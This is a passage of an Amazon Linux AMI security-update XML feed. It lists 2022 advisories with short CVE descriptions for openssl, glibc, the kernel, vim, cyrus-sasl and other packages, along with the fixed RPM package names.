</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25235" title="" id="CVE-2022-25235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25236" title="" id="CVE-2022-25236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-devel" version="2.1.0" release="12.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.27.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.27.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.27.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.27.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.27.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.27.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.27.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="12.27.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1574</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1574: important priority package update for cyrus-sasl</title><issued date="2022-03-10 00:54:00" /><updated date="2022-03-10 19:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24407:
A flaw was found in the SQL plugin shipped with Cyrus SASL. Failure to properly escape the SQL input allows a remote attacker to execute arbitrary SQL commands. This issue can lead to the escalation of privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24407" title="" id="CVE-2022-24407" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cyrus-sasl-plain" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-plain-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-lib" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-lib-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-gssapi" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-gssapi-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-devel" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-devel-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-debuginfo" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-debuginfo-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-sql" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-sql-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ntlm" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-ntlm-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-md5" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-md5-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ldap" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-ldap-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ldap" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-ldap-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-gssapi" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-gssapi-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-md5" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-md5-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-debuginfo" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-debuginfo-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-ntlm" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-ntlm-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-plain" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-plain-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-sql" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-sql-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-devel" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-devel-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-lib" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-lib-2.1.23-13.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1575</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1575: important priority package update for openssl</title><issued date="2022-03-15 18:54:00" /><updated date="2022-04-26 18:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0778:
The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778" title="" id="CVE-2022-0778" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.156.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.156.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.156.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.156.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.156.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1576</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1576: medium priority package update for glibc</title><issued date="2022-04-04 23:46:00" /><updated date="2022-04-06 21:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23219:
A stack based buffer-overflow vulnerability was found in the deprecated compatibility function clnt_create() in the sunrpc's clnt_gen.c module of the GNU C Library (aka glibc) through 2.34. This vulnerability copies its hostname argument onto the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) lead to arbitrary code execution.
CVE-2022-23218:
A stack based buffer-overflow vulnerability was found in the deprecated compatibility function svcunix_create() in the sunrpc's svc_unix.c module of the GNU C Library (aka glibc) through 2.34. This vulnerability copies its path argument onto the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) then it will lead to arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218" title="" id="CVE-2022-23218" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219" title="" id="CVE-2022-23219" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-static" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-324.189.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1577</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1577: important priority package update for kernel</title><issued date="2022-04-04 23:46:00" /><updated date="2024-08-29 00:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48855:
In the Linux kernel, the following vulnerability has been resolved:
sctp: fix kernel-infoleak for SCTP sockets
CVE-2022-20368:
Product: AndroidVersions: Android kernelAndroid ID: A-224546354References: Upstream kernel
CVE-2022-1016:
A flaw was found in the Linux kernel in net/netfilter/nf_tables_core.c:nft_do_chain, which can cause a use-after-free. This issue needs to handle return with proper preconditions, as it can lead to a kernel information leak problem caused by a local, unprivileged attacker.
CVE-2022-1015:
A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1015" title="" id="CVE-2022-1015" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1016" title="" id="CVE-2022-1016" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20368" title="" id="CVE-2022-20368" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48855" title="" id="CVE-2022-48855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.273-140.502.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1578</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1578: medium priority package update for libgcrypt</title><issued date="2022-04-04 23:47:00" /><updated date="2022-04-06 21:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33560:
A side-channel attack flaw was found in the way libgcrypt implemented Elgamal encryption. This flaw allows an attacker to decrypt parts of ciphertext encrypted using Elgamal, for example, when using OpenPGP. The highest threat from this vulnerability is to confidentiality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560" title="" id="CVE-2021-33560" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libgcrypt-debuginfo" version="1.5.3" release="12.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.20.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-devel" version="1.5.3" release="12.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-devel-1.5.3-12.20.amzn1.x86_64.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-1.5.3-12.20.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.20.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.20.amzn1.i686.rpm</filename></package><package name="libgcrypt-devel" version="1.5.3" release="12.20.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-devel-1.5.3-12.20.amzn1.i686.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.20.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-1.5.3-12.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1579</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1579: medium priority package update for vim</title><issued date="2022-04-04 23:48:00" /><updated date="2022-04-06 21:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0943:
A heap buffer overflow flaw was found in vim's suggest_try_change() function of the spellsuggest.c file. This flaw allows an attacker to trick a user into opening a crafted file, triggering a heap-overflow and causing an application to crash, which leads to a denial of service.
CVE-2022-0729:
A flaw was found in vim. The vulnerability occurs due to crashes within specific regexp patterns and strings and leads to an out-of-range vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0714:
A heap-buffer-overflow flaw was found in vim's win_lbr_chartabsize() function of charset.c file. The issue occurs due to an incorrect 'vartabstop' value. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap-overflow, and can cause an application to crash, eventually leading to a denial of service.
CVE-2022-0696:
A NULL pointer dereference flaw was found in vim's find_ucmd() function of usercmd.c file. This flaw allows an attacker to trick a user into opening a crafted file, triggering a NULL pointer dereference. This issue leads to an application crash, causing a denial of service.
CVE-2022-0685:
A flaw was found in vim. The vulnerability occurs due to a crash when using a special multi-byte character and leads to an out-of-range vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0629:
A stack-based buffer overflow flaw was found in vim's ga_concat_shorten_esc() function of src/testing.c file. This flaw allows an attacker to trick a user into opening a crafted file, triggering a stack-overflow. This issue can lead to an application crash, causing a denial of service.
CVE-2022-0572:
A heap-based buffer overflow flaw was found in vim's ex_retab() function of indent.c file. This flaw occurs when repeatedly using :retab. This flaw allows an attacker to trick a user into opening a crafted file triggering a heap-overflow.
CVE-2022-0554:
A flaw was found in vim that causes an out-of-range pointer offset vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0443:
A flaw was found in vim. The vulnerability occurs due to using freed memory which results in a use-after-free vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0417:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0413:
A flaw was found in vim. The vulnerability occurs due to using freed memory when the substitute uses a recursive function call, resulting in a use-after-free vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0408:
A flaw was found in vim. The vulnerability occurs due to stack corruption when looking for spell suggestions and leads to a stack buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0393:
A flaw was found in vim. The vulnerability occurs due to a crash when recording and using Select mode and leads to an out-of-bounds read. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0393" title="" id="CVE-2022-0393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0408" title="" id="CVE-2022-0408" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0413" title="" id="CVE-2022-0413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0417" title="" id="CVE-2022-0417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0443" title="" id="CVE-2022-0443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0554" title="" id="CVE-2022-0554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0572" title="" id="CVE-2022-0572" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0629" title="" id="CVE-2022-0629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0685" title="" id="CVE-2022-0685" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0696" title="" id="CVE-2022-0696" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0714" title="" id="CVE-2022-0714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0729" title="" id="CVE-2022-0729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0943" title="" id="CVE-2022-0943" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-common" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.4621-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.2.4621-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.4621-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.4621-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.4621-1.1.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.4621-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.4621-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.4621-1.1.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.4621-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.4621-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1580</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1580: important priority package update for log4j-cve-2021-44228-hotpatch</title><issued date="2022-04-18 19:44:00" /><updated date="2022-04-19 18:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0070:
The Apache Log4j hotpatch package starting with log4j-cve-2021-44228-hotpatch-1.1-16 will now explicitly mimic the Linux capabilities and cgroups of the target Java process that the hotpatch is applied to.
In order to mimic the Linux capabilities of the target process, Amazon Linux 1 customers need to be running kernel version 4.14.275-142.503 or later, while Amazon Linux 2 customers on ARM need to be running kernel versions 4.14.275-207.503, 5.4.188-104.359, 5.10.109-104.500 or later. Amazon Linux 2 customers on Intel or AMD instances do not need an updated kernel.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0070" title="" id="CVE-2022-0070" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j-cve-2021-44228-hotpatch" version="1.1" release="16.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-cve-2021-44228-hotpatch-1.1-16.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1581</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1581: important priority package update for kernel</title><issued date="2022-04-18 19:46:00" /><updated date="2022-04-19 18:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-28356:
In the Linux kernel before 5.17.1, a refcount leak bug was found in net/llc/af_llc.c.
CVE-2022-27666:
A heap buffer overflow flaw was found in IPsec ESP transformation code in net/ipv4/esp4.c and net/ipv6/esp6.c. This flaw allows a local attacker with a normal user privilege to overwrite kernel heap objects and may cause a local privilege escalation threat.
CVE-2022-26490:
A buffer overflow flaw was found in the Linux kernel's NFC protocol functionality. This flaw allows a local user to crash or escalate their privileges on the system.
